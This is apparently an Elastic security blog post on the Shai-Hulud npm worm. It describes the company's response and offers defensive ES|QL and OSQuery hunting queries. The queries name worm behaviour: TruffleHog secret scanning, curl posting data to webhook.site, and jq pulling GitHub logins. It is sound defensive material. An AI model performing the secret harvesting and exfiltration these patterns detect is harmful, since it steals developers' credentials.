Share on TwitterShare on Twitter
Share on LinkedInShare on LinkedIn
Share on FacebookShare on Facebook
Share by EmailShare by Email
Print this pagePrint
Compromised Node Package Manager (npm) packages and the subsequent identification of the Shai-Hulud worm have the software development community in response mode. Elastic understands the critical importance of maintaining the integrity of our software supply chain; while Elastic products are not shipped with npm, our software uses npm to retrieve packages from the npmjs[.]com registry during the build process.
In this blog, we will walk through the steps Elastic has taken to analyze our code base and how we mitigate threats posed by these compromised packages as well as our prevention and detection rules, hunt queries, and recommendations.
Understanding the threat: The npm compromise and Shai-Hulud
npm is one of the largest software registries for JavaScript (JS). In September, malicious updates were detected in at least 40 npm packages, including the popular @crtl/tinycolor package.
Certain npm packages were infected with self-replicating malware known as the "Shai-Hulud” worm. After compromising an npm developer account and enumerating other packages maintained by that developer, the worm publishes modified versions that include the worm's code. This propagation cycle repeats continuously as new developer accounts are compromised.
Elastic's response
At this time, Elastic has found no evidence of compromise within Elastic’s software environment.
Elastic Information Security team initiated an immediate investigation to:
Audit dependencies: Elastic continuously scans our products using software composition analysis (SCA) tooling which allowed us to quickly audit our codebase and dependencies to identify any known malicious npm packages.
Disable Elastic npm JavaScript repository updates: We removed the ability for new packages to be published to the Elastic npm JS repository and have audited packages published during the known exposure window.
Disable dependencies auto-updating: As a precaution, we have temporarily disabled auto-updating JavaScript dependencies to newer versions for the continuous builds in our CI/CD infrastructure.
Implement endpoint scanning: Using the OSQuery integration for Elastic Agent, we implemented continuous scanning for the known compromised npm packages installed on Elastic laptops.
Run out-of-the-box (OOTB) detection rules: Elastic Security Labs already provides OOTB Elastic Security detection rules to aid in identifying systems that have installed and are running a compromised package. We’ve included more details on the protections listed below that you can leverage for your own threat hunting.
- Notify Elastic developers: Advisories were sent to Elastic developers, notifying them of the ongoing investigation and prohibiting the update or installation of new npm packages.
Hunting queries
We recommend Elastic Security customers hunt for potential compromises in their own environments. The following ES|QL queries can be used to identify behaviors associated with this supply chain compromise.
Note: Hunting queries can identify potential compromises but still require analysis and investigation to determine a true positive.
TruffleHog
Execution of TruffleHog, software developed to discover secrets, with known arguments:
FROM logs-*
| WHERE event.type == "start"
and (process.name == "trufflehog.exe" or process.name == "trufflehog")
and process.args : "--results=verified"
and process.args : "--json"
and process.args : "filesystem"If you are collecting audit logs using any Elastic Agent SaaS integrations, such as GitHub, Slack, AWS, GCP, and Azure, you can create a detection rule alerting on the Trufflehog user agent being observed within the data.
FROM logs-*
| WHERE user_agent.original == "TruffleHog"cURL exfiltrating data
Identify cURL being used to exfiltrate data from a compromised host to the known malicious web server.
FROM logs-*
| WHERE event.type == "start"
AND process.name IN ("curl", "curl.exe")
AND (process.command_line LIKE "*webhook.site*" OR process.command_line LIKE "*shai-hulud*")
AND process.args : "-d"Worm YML file creation
Identify the creation of the GitHub Actions workflow file, shai-hulud-workflow.yml.
FROM logs-*
| WHERE event.type == "creation"
AND file.name == "shai-hulud-workflow.yml"jq parsing the repository file
Identify if jq is being used to discover the authenticated usernames (.login) and the default GitHub branch commit SHA (.object.sha).
FROM logs-*
| WHERE event.type == "start"
AND process.name == "jq"
AND process.args == "-r"
AND (process.args == ".object.sha" OR process.args == ".login")Compromised packages
You can use OSQuery to identify known compromised packages. Configure an OSQuery pack to run on systems to continuously collect all installed npm packages:
SELECT * FROM npm_packagesThe results from these OSquery packs will be searchable in the logs-osquery_manager.result* index. You can search for any installed packages that are known to be infected as well as create detection rules for any of those packages.
OOTB Elastic Detections
The following out-of-the-box detection and prevention rules also provide coverage for the Shai-Hulud worm:
Unusual Network Connection to Suspicious Web Service (Detection Engine)
Connection to Commonly Abused Web Services (Detection Engine)
Potential Discovery of DPAPI Master Keys (Elastic Defend)
Potential Discovery of Windows Credential Manager Store (Elastic Defend)
Web Browser Credential Access via Unsigned Process (Elastic Defend)
Potential Browser Information Discovery (Elastic Defend)
- Web Browser Credential Data Accessed by Unsigned or Untrusted Process (Elastic Defend)
Commitment to security
Security is foundational to Elastic’s development lifecycle and operational processes. The npm compromise and the Shai-Hulud worm underscore the persistent and rapidly evolving nature of cyber threats to global software supply chains. We remain committed to:
Continuous monitoring: Maintaining 24/7 monitoring of our systems and networks for any signs of compromise.
Rapid response: Ensuring our security teams are prepared to respond swiftly and effectively to new threats.
Transparency: Communicating openly with our users and community about security incidents and our mitigation efforts.
We will continue to monitor new information, and as we learn more about this event, we will update this publication. For more information on how Elastic can help secure your environment, please visit our security solutions page.
The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.
Share
- Share on Twitter
Share on Twitter
- Share on LinkedIn
Share on LinkedIn
- Share on Facebook
Share on Facebook
- Share by Email
Share by Email
- Print this page
Print
